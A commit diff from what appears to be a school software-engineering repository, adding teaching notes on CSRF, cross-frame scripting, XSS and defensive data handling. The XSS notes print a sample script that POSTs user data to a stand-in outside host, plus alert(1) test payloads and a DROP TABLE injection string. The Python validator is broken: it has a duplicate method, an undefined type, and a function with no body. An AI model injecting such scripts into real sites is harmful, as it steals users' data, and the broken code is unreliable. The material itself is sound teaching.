improve cyber docs

TempeHS · Oct 3, 2024 · 09252c5 · 09252c5
1 parent 87c1989
commit 09252c5
Show file tree

Hide file tree

Showing 11 changed files with 174 additions and 47 deletions.
diff --git a/.studentResources/CSRF/README.md b/.studentResources/CSRF/README.md
@@ -0,0 +1,14 @@
+# Cross-Site Request Forgery (CSRF)
+
+Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
+
+## How to secure against this attack
+
+- End user education.
+- Https encryption.
+- End user education.
+- Implement a CORS Content Security Policy (CSP).
+- Understand how the attack can be executed in the specific conext of the application and user then code review with specific senarios in mind.
+- Implement three-factor authentication (3FA) for administrative opperations.
+- Seperate production and development environments.
+- Whitelist firewall policies
diff --git a/.studentResources/Cross_Frame_Scripting/README.md b/.studentResources/Cross_Frame_Scripting/README.md
@@ -0,0 +1,23 @@
+# Cross Frame Scripting
+
+Cross-Frame Scripting (XFS) is an attack that combines malicious JavaScript with an iframe that loads a legitimate page in an effort to steal data from an unsuspecting user. This attack is usually only successful when combined with social engineering. An example would consist of an attacker convincing the user to navigate to a web page the attacker controls. The attacker’s page then loads malicious JavaScript and an HTML iframe pointing to a legitimate site. Once the user enters credentials into the legitimate site within the iframe, the malicious JavaScript steals the keystrokes.
+
+[This example](index.html) demonstrates how easy it is to spoof a webpage, in this case the Unsecure PWA.
+
+This attack is particularly effective on mobile devices as the browser hides most of the URL and the the spoofing page only requires some HTML and some inline JS. Which is why XFS coupled with SMS scams are some of the most sucessful.
+
+> [!NOTE]
+> Make sure the Unsecure PWA is being served at [http://127.0.0.1](http://127.0.0.1) before opening the demonstration page.  
+> `python main.py`
+
+As a more sophisticated attack the threat actors would:
+
+1. Serve both sites through a proxy circumventing any CORS CSP policy
+2. Have a back to base script that intercepts and transmits input data (username, password, credit card, etc) without the user knowing.
+3. Have a threat actor listening for inputs and interacting/handling the victim, which is how 2FA is often bypassed.
+
+How to secure against this attack
+
+1. End user education.
+2. Monitor http logs for unusually repeative GET calls.
+3. Implement Content Security Policy (CSP) preventing `<iframe>` loading.
diff --git a/...s/Cross_Frame_Scripting_Tester/index.html → ...esources/Cross_Frame_Scripting/index.html b/...s/Cross_Frame_Scripting_Tester/index.html → ...esources/Cross_Frame_Scripting/index.html
@@ -6,7 +6,7 @@
         <meta http-equiv="X-UA-Compatible" content="ie=edge" />
 		<link rel="stylesheet" type="text/css" href="CSS/style.css">
         <title>The Unsecure PWA</title>
-        <link rel="icon" type="image/x-icon" href="images\favicon.png" />
+        <link rel="icon" type="image/x-icon" href="http:\\127.0.0.1\static\images\favicon.png" />
         <meta name="theme-color" content="#14E6DD" />
    </head>
 <body> 

diff --git a/.studentResources/Cross_Frame_Scripting_Tester/README.md b/.studentResources/Cross_Frame_Scripting_Tester/README.md
diff --git a/.studentResources/Cross_Frame_Scripting_Tester/images/favicon.png b/.studentResources/Cross_Frame_Scripting_Tester/images/favicon.png
diff --git a/.studentResources/XXS_scripts/README.md b/.studentResources/XXS_scripts/README.md
@@ -1,7 +1,53 @@
-# XXS Testing scripts
-To use these scripts paste them into input boxes and see what gets executed or saved in the HTML
+# XXS - Cross Site Scripting
+
+Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
+
+## Software Engineeringing Course Specifications
+
+_"Cross-site scripting (XSS) involves injecting malicious code into an otherwise safe website. It is usually done through user input that is not sufficiently sanitised before being processed and stored on the server._  
+_Students should be able to interpret fragments of JavaScript related to cross-site scripting."_
+
+Either an internal threat actor has intentionally or unintentionally inserted the malicious code into the code base or SQL/XXS vulnerability has been expoited to insert the malicious code into the code base. Students should be able to identify that a unknown script has been executed or that a POST request has been made to an unknown URL.
+
+```html
+    <HTML>
+        <HEAD>
+            <TITLE>Welcome to yourWebsite</TITLE>
+            <link href="http://yourwebsite.com/favicon.png" />
+        </HEAD>
+        <BODY>
+            <H1>Your Website</H1>
+        <SCRIPT src="http://www.randomUrl.com/danger.js"></SCRIPT>
+
+        or
+
+        <SCRIPT>
+            const response = fetch("http://www.randomUrl.com", {
+                method: 'POST', 
+                headers: {
+                'Content-Type': 'application/json; charset=UTF-8',
+                },
+            body: JSON.stringify(yourData),
+            });
+        </SCRIPT>
+        </BODY>
+    </HTML>
+```
+
+## Non-destructive XXS Test Scripts
+
+To use these scripts paste them into any input boxes and see what gets executed or saved in the HTML.
 
 1. `<script>alert(1)</script>`
 2. `<img src=x onload(alert(1))>`
 3. `<svg onload=alert(1)>`
-4. `<iframe src=”javascript:alert(1)”></iframe>`
+4. `<iframe src=”javascript:alert(1)”></iframe>`
+
+## How to secure against this attack
+
+1. Regular code reviews
+2. Only known and secure 3rd party javascript libries should be externally linked. Preferably 3rd party libraries should be locally served after a code review.
+3. Defensive data handling
+4. Declare the language `<html lang="en">`
+5. Delare charset `<meta charset="utf-8">`
+6. Content Security Policy (CSP) Blocking `<SVG>` and `<SCRIPT>` tags.
diff --git a/.studentResources/data_sanatising/data_handler.py b/.studentResources/data_sanatising/data_handler.py
diff --git a/.studentResources/defensive_data_handling/README.md b/.studentResources/defensive_data_handling/README.md
@@ -0,0 +1,25 @@
+# Defensive Data Handling
+
+## Input validation
+
+Input validation is a security control where input is checked to be valid data. It is best practice to validate data on entry to the application before it is stored or processed. If data is not valid it should be discarded and UI feedback provided to the user.
+
+- Frontend data validation with [form field attributes](..\secure_form_attributes/README.md).
+- Backend data validation with [regular expressions and REGEXR](data_handler.py)
+
+## Data sanitisation
+
+Data sanitisation is where data is 'santised' or cleaned for processing or storing. This is the process of replacing any potentially malicious characacters with non processing codes so the text will render as expected but no prcoessing will occur. For example the malicious string **`"';DROP TABLE users"`** when santitised will be stored as **\&#39;\&#59;DROP TABLE users** but will be render as **`&#39;&#59;DROP TABLE users'**.
+
+### Data sanatisation methods
+
+- Best practice is to make all strings web safe before storing or processing them using a library like [html](https://docs.python.org/3/library/html.html).
+- Content loaded from a JSON file is loaded after all JavaScript has been executed so any malicious code in a JSON will never be executed by the browser.*
+- Jinga2 (built into Flask) converts all strings into web safe strings before rendering on the front-end.*
+
+    \* _These measures are reactive but are still recomended as best pratice in case malicious code still manages to bypass all defensive measures._
+
+## Error Handling
+
+Error handling (alse called exception catching) is essential in defensive data handing as a malicious user may attempt to exploit the application by providing it with invalid input to attempt to trigger an vulnerability. Students should be familiar with [Python exception handling](https://docs.python.org/3/tutorial/errors.html) specifically the [try](https://docs.python.org/3/reference/compound_stmts.html#try) statement.
+
diff --git a/.studentResources/defensive_data_handling/data_handler.py b/.studentResources/defensive_data_handling/data_handler.py
@@ -0,0 +1,56 @@
+##############################################
+# RE = RegExr = Regular Expressions          #
+# Read the documentation and tutorials       #
+# https://docs.python.org/3/library/re.html  #
+# https://docs.python.org/3/howto/regex.html #
+##############################################
+
+import re
+import html
+import bcrypt
+
+class data_handler: 
+
+    def __init__(self): 
+        pass
+
+    def check_password(self, password: str) -> bool: 
+        if len(password) < 10:
+            return False
+        if len(password) > 20:
+            return False
+        if re.search(r'[ ]', password):
+            return False
+        if not re.search(r'[A-Z]', password):
+            return False
+        if not re.search(r'[a-z]', password):
+            return False
+        if not re.search(r'[0-9]', password):
+            return False
+        if not re.search(r'[@#$%^&*()+|~-=`{}:”;,./]', password):
+            return False
+        return True
+
+    def make_web_safe(self, string: str) -> str: 
+        return html.escape(string)
+
+    def check_email(self, email: str) -> bool: 
+        if re.fullmatch(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)",email):
+            return True
+        else:
+            return False
+
+    def validate_name(self, name: str) -> bool: 
+        #Check if the name is valid (only alphabets allowed).
+        if not name.isalpha(): 
+            return False 
+        return True 
+
+    def validate_name(self, number: Double) -> bool: 
+        #Check if the name is valid (only alphabets allowed).
+        if number.isalpha(): 
+            return False 
+        return True 
+
+    def salt_and_hash(password):
+        # to be implemented
diff --git a/.studentResources/data_sanatising/main.py → ...Resources/defensive_data_handling/main.py b/.studentResources/data_sanatising/main.py → ...Resources/defensive_data_handling/main.py
diff --git a/.studentResources/safe_API/README.md b/.studentResources/safe_API/README.md
@@ -1,4 +1,9 @@
-# Safe API
+# API
+
+API is the acronym for application programming interface — a software intermediary that allows two applications to talk to each other. APIs are an accessible way to extract and share data within and across organizations.
+
+> [!NOTE]
+> The [W3C defines API's as best pratice](https://www.w3.org/TR/dwbp/#accessAPIs) in making data available.
 
 This example safe API is a basic implementaion for a random movie generator. The API will randomly select a film for it's database and return it as a JSON. A API arguement call can return if the movie was liked or disliked. A new movie can also be added to the databse through the POST method with a JSON file to the API.